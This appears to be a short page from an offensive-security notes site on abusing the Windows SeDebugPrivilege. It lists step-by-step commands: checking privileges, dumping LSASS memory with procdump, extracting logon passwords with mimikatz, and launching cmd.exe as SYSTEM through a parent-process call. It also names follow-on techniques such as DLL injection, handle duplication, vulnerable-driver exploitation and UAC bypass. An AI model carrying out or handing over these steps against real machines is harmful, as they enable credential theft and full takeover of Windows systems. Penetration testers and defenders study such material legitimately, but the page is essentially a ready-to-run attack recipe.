6.Sedebugprivilege

1. Verify SeDebugPrivilege:

  • whoami /priv

2. Dump LSASS:

  • procdump.exe -accepteula -ma lsass.exe lsass.dmp

  • (Task Manager: Right-click lsass.exe -> Create dump file)

3. Extract Credentials:

  • mimikatz.exe

  • sekurlsa::minidump lsass.dmp

  • sekurlsa::logonpasswords

4. RCE as SYSTEM:

  • [MyProcess]::CreateProcessFromParent(<PID>,"cmd.exe","") (PowerShell)

  • (Alternative tools: depends on the tool)

Tools:

  • pypykatz: For LSASS dump analysis on non-Windows systems.

  • Process Explorer (Sysinternals): For detailed process information.

  • WinDbg: For advanced process debugging and memory analysis.

Techniques:

  • DLL Injection: Injecting malicious code into privileged processes.

  • Handle Duplication: Gaining access to privileged process resources.

  • Exploiting Vulnerable Drivers: Leveraging SeDebugPrivilege to exploit kernel vulnerabilities.

  • Bypassing User Account Control (UAC): Using UAC bypasses to get the initial elevated prompt, that is required by SeDebug.

Previous5.Seimpersonate-and-seassignprimarytokenNextExploiting SeTakeOwnershipPrivilege

Last updated